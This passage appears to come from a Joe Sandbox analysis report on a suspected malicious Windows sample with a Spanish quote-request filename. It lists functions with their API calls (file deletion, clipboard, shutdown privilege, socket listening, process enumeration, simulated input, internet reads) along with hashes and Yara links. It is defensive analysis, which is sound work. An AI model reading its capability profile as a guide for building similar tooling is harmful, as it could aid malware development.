Instruction Fuzzy Hash: 7E618CB15243459FC710EF64C8489AEB3E8FF89314F04895EF98987252DB31E965CF92

Function 0026D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00203AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00203A97,?,?,00202E7F,?,?,?,00000000), ref: 00203AC2

Part of subcall function 0026E199: GetFileAttributesW.KERNEL32(?,0026CF95), ref: 0026E19A

FindFirstFileW.KERNEL32(?,?), ref: 0026D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0026D1DD
MoveFileW.KERNEL32(?,?), ref: 0026D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0026D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0026D237

Part of subcall function 0026D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0026D21C,?,?), ref: 0026D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0026D253
FindClose.KERNEL32(00000000), ref: 0026D264

Strings

\*.*, xrefs: 0026D0CD, 0026D0D6, 0026D0EB

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 0029e3a1648141a46a8c349f3d0a38908f7e81f4057f1a04b9afa9039e80d371
Instruction ID: 7c848654d2a91b4ebbda4f86cbe7fb835233c97e3cb6f9191226c27024a3fe6b
Opcode Fuzzy Hash: 0029e3a1648141a46a8c349f3d0a38908f7e81f4057f1a04b9afa9039e80d371
Instruction Fuzzy Hash: 05615D31D1124D9BCF05EFA0D9929EEB7B9AF55300F6041A5E80677192EB305FA9CF60

Function 0027ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0027ED91
EmptyClipboard.USER32 ref: 0027ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0027EDAC
CloseClipboard.USER32 ref: 0027EEA3

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 17f5f723f55607e18e956f5bdd5b5156062a8e7cba9a15a471fe8d44cae5dec8
Instruction ID: 3dc440c794734e8f9cd0f380f552a6ec422f1e281056b010e6f76c3d3a4c3af2
Opcode Fuzzy Hash: 17f5f723f55607e18e956f5bdd5b5156062a8e7cba9a15a471fe8d44cae5dec8
Instruction Fuzzy Hash: 0E41F071614212AFD720CF15E88CF19BBE4FF48328F25C49AE4198B6A2C731EC51CBA0

Function 0026E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 002616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0026170D
Part of subcall function 002616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0026173A
Part of subcall function 002616C3: GetLastError.KERNEL32 ref: 0026174A

ExitWindowsEx.USER32(?,00000000), ref: 0026E932

Strings

, xrefs: 0026E920
, xrefs: 0026E95C
SeShutdownPrivilege, xrefs: 0026E902
@, xrefs: 0026E925

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 59567dece5c336f30380f49ecd9546589a9631a8900523e1ee3adf91fc52023c
Instruction ID: 304f633ac261cd2fcc31529a72fc8b0a20e994b101c254442e4de0aa60936800
Opcode Fuzzy Hash: 59567dece5c336f30380f49ecd9546589a9631a8900523e1ee3adf91fc52023c
Instruction Fuzzy Hash: BF01D676631211ABFF5466B4AC8AFBB736C9F14750F260522FC02E21D2E5A15CE085A0

Function 00281204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00281276
WSAGetLastError.WSOCK32 ref: 00281283
bind.WSOCK32(00000000,?,00000010), ref: 002812BA
WSAGetLastError.WSOCK32 ref: 002812C5
closesocket.WSOCK32(00000000), ref: 002812F4
listen.WSOCK32(00000000,00000005), ref: 00281303
WSAGetLastError.WSOCK32 ref: 0028130D
closesocket.WSOCK32(00000000), ref: 0028133C

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 6e56593340565237e796d518ed714f59cfd4cdefabeae0f5fbd0fa5eb6694c16
Instruction ID: dd1842c31087add5be9d8ae4e64c739e82c61ccb238f28b376fd7eddebf6d3b6
Opcode Fuzzy Hash: 6e56593340565237e796d518ed714f59cfd4cdefabeae0f5fbd0fa5eb6694c16
Instruction Fuzzy Hash: 8141B3356102119FD710EF24D488B69BBE9BF46318F288189D8568F2DBC771EC92CBE1

Function 0023B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0023B9D4
_free.LIBCMT ref: 0023B9F8
_free.LIBCMT ref: 0023BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,002A3700), ref: 0023BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,002D121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0023BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,002D1270,000000FF,?,0000003F,00000000,?), ref: 0023BC36
_free.LIBCMT ref: 0023BD4B

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: ec85868e544704ce00639522723b19c77d13d49f192d57e50ad4c6695c5995eb
Instruction ID: 0a2fb2c593c1c02ea9f73f7b53fd53802d0b06312e6fc4475f1a4ff2799e1503
Opcode Fuzzy Hash: ec85868e544704ce00639522723b19c77d13d49f192d57e50ad4c6695c5995eb
Instruction Fuzzy Hash: 9FC14BF1E24215AFCB22DF789C45BAABBB9EF41310F14419BEA94D7251DB308E61CB50

Function 0026D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00203AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00203A97,?,?,00202E7F,?,?,?,00000000), ref: 00203AC2

Part of subcall function 0026E199: GetFileAttributesW.KERNEL32(?,0026CF95), ref: 0026E19A

FindFirstFileW.KERNEL32(?,?), ref: 0026D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0026D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0026D481
FindClose.KERNEL32(00000000), ref: 0026D498
FindClose.KERNEL32(00000000), ref: 0026D4A1

Strings

\*.*, xrefs: 0026D3F2

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 04f63381b6c5d9011498befa147d1b30a8769b8151d9663eedf8088a186ccc63
Instruction ID: c369c9f6a6a0b39d0092927713ab4bef54a45046d44f4ef926c3e4e67fc9acce
Opcode Fuzzy Hash: 04f63381b6c5d9011498befa147d1b30a8769b8151d9663eedf8088a186ccc63
Instruction Fuzzy Hash: A53182315283459FC304EF64D8959AF77A8BE91310F844A1DF4D1531D2EB30AE69DB63

Function 0023E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0023E645

Strings

1#QNAN, xrefs: 0023F84B
1#IND, xrefs: 0023F83D
1#SNAN, xrefs: 0023F844
1#INF, xrefs: 0023F852

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: c314f489ab77f10b59804579daa8b62ca372b3d6d37051438458a9349cd44e84
Instruction ID: caecc16030d62c46132a4f16895be630a36163e5a71ad5f0f8b4c88b85eec49e
Opcode Fuzzy Hash: c314f489ab77f10b59804579daa8b62ca372b3d6d37051438458a9349cd44e84
Instruction Fuzzy Hash: 4BC26BB1E286298FDF65CE28DD407EAB7B5EB44304F1541EAD80DE7280E774AE958F40

Function 0027648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 002764DC
CoInitialize.OLE32(00000000), ref: 00276639
CoCreateInstance.OLE32(0029FCF8,00000000,00000001,0029FB68,?), ref: 00276650
CoUninitialize.OLE32 ref: 002768D4

Strings

.lnk, xrefs: 002764BA, 00276524, 002765E0

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 80d67746938b94b7253302c3082237b1ef5f0c50003f0b1e80b650ba6bba08e2
Instruction ID: 0bf6f2df67c557656579f393d7c3bfe993c0dab109d23c0f87e69be151e7ab7d
Opcode Fuzzy Hash: 80d67746938b94b7253302c3082237b1ef5f0c50003f0b1e80b650ba6bba08e2
Instruction Fuzzy Hash: CFD16A715287019FC304DF24C885D6BB7E9FF98304F50896DF5998B2A2EB30E959CB92

Function 002822DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 002822E8

Part of subcall function 0027E4EC: GetWindowRect.USER32(?,?), ref: 0027E504

GetDesktopWindow.USER32 ref: 00282312
GetWindowRect.USER32(00000000), ref: 00282319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00282355
GetCursorPos.USER32(?), ref: 00282381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002823DF

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 32f49451fa9e11a286ae004e1ecb9cbdaf189cccbd069d56b8ebb3b582349a1f
Instruction ID: 5ebbabdb7933a5776c440739a52277f1b006a89689fadd11e6ae4a4472e0095d
Opcode Fuzzy Hash: 32f49451fa9e11a286ae004e1ecb9cbdaf189cccbd069d56b8ebb3b582349a1f
Instruction Fuzzy Hash: 8931E376505315AFDB20EF54D849F5BB7E9FF84310F10091AF985A7181DB34E918CB92

Function 00279B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00279B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00279C8B

Part of subcall function 00273874: GetInputState.USER32 ref: 002738CB
Part of subcall function 00273874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00273966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00279BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00279C75

Strings

*.*, xrefs: 00279B5D

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 4fae808f6c74fd63f8eb84e938451373e22cd565f4ab5fbad847968268c592f1
Instruction ID: c6bdae87c018971171e747c277e7650ac72e38c0e7f92e2cc24fc3d3b5da2b22
Opcode Fuzzy Hash: 4fae808f6c74fd63f8eb84e938451373e22cd565f4ab5fbad847968268c592f1
Instruction Fuzzy Hash: 8B41697191430A9FDF15DF64D949AEE7BB4EF09314F24815AE809A3191D7309EE4CF60

Function 0021997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00219BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00219BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00219A4E
GetSysColor.USER32(0000000F), ref: 00219B23
SetBkColor.GDI32(?,00000000), ref: 00219B36

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 730842acfbafa2ec0f7f2f3b633877a155c8543fe9f102ede2170c9fcf9c49ac
Instruction ID: 4df060ef45dc90e63291c8373cba698a50b5f21fc53747539e8f959a6209b839
Opcode Fuzzy Hash: 730842acfbafa2ec0f7f2f3b633877a155c8543fe9f102ede2170c9fcf9c49ac
Instruction Fuzzy Hash: 25A13A70278401BEE7249E2CAC78EFB26DDDF56301B14010AF802C6A91CA769DF9C675

Function 00281806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0028304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0028307A
Part of subcall function 0028304E: _wcslen.LIBCMT ref: 0028309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0028185D
WSAGetLastError.WSOCK32 ref: 00281884
bind.WSOCK32(00000000,?,00000010), ref: 002818DB
WSAGetLastError.WSOCK32 ref: 002818E6
closesocket.WSOCK32(00000000), ref: 00281915

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 0552754bea037944fee5c80252b646994d82b0b8320e5bfa4520270110b96407
Instruction ID: ece3afa10149c4ab1648603ab0a57c648391a281fc9d8826b4cf2c1a7aa32fb4
Opcode Fuzzy Hash: 0552754bea037944fee5c80252b646994d82b0b8320e5bfa4520270110b96407
Instruction Fuzzy Hash: 9E51C675A102009FE710EF24C8CAF6A77E9AB44718F548098F9055F3D3C771ADA2CBA1

Function 00208060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 0020813C
VUUU, xrefs: 002083E8
VUUU, xrefs: 00245DF0
VUUU, xrefs: 002083FA
VUUU, xrefs: 0020843C

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 46dd340bb041d4874ee5c11f64e6c5b01338ababc4b7e083b5ed2c5252b658a7
Instruction ID: d84a074567485f51afec8148eaa057087f7dffdcca1518150fc97d02290761a6
Opcode Fuzzy Hash: 46dd340bb041d4874ee5c11f64e6c5b01338ababc4b7e083b5ed2c5252b658a7
Instruction Fuzzy Hash: 57A2B470E2072ACBDF28CF58C8447AEB7B1BF45310F1581A6D895A7286DB709DA1CF51

Function 00268298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 002682AA

Strings

|, xrefs: 002682DA
(, xrefs: 002682F0
tb,, xrefs: 002684F4

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: lstrlen
String ID: ($tb,$|
API String ID: 1659193697-4185060631
Opcode ID: 67b340653b6f72cd5a9048f346939287ea377e17870c71730e6e235ca303762f
Instruction ID: a44049b76034b658b3925d11b8cb51e8c90272bcba6dbc017fe5ff0b0ac11014
Opcode Fuzzy Hash: 67b340653b6f72cd5a9048f346939287ea377e17870c71730e6e235ca303762f
Instruction Fuzzy Hash: 39323774A106069FCB28CF19C080A6AB7F0FF48710B15C56EE49ADB3A1EB70E991CB40

Function 0028A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0028A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0028A6BA

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

Process32NextW.KERNEL32(00000000,?), ref: 0028A79C
CloseHandle.KERNEL32(00000000), ref: 0028A7AB

Part of subcall function 0021CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00243303,?), ref: 0021CE8A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: daae6124943926e67be190280d5deac255d2fbfca175728c75eaa850136cc9a5
Instruction ID: 9022393ee34b4614caf69655f0d2f7768bacd0f4640a7e510015b302135c1440
Opcode Fuzzy Hash: daae6124943926e67be190280d5deac255d2fbfca175728c75eaa850136cc9a5
Instruction Fuzzy Hash: 41518E715183019FD710EF24C886A6BBBE8FF89714F00892EF58997292EB30D954CF92

Function 0026AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0026AAAC
SetKeyboardState.USER32(00000080), ref: 0026AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0026AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0026AB88

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 35d6a25e32b41630b8b85e92c44e860f4a1fa6f1561f9ed0d1d9b755b5cd695c
Instruction ID: 9c02e3bde8dce77f661e8516d4bb145a4b05739620f3fad1d8bfcc92213ec38b
Opcode Fuzzy Hash: 35d6a25e32b41630b8b85e92c44e860f4a1fa6f1561f9ed0d1d9b755b5cd695c
Instruction Fuzzy Hash: 6C312730A60249AEEB35CF648C05BFE7BAAAB65314F14421BE081621D0D3758DE1CB62

Function 0027CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0027CE89
GetLastError.KERNEL32(?,00000000), ref: 0027CEEA
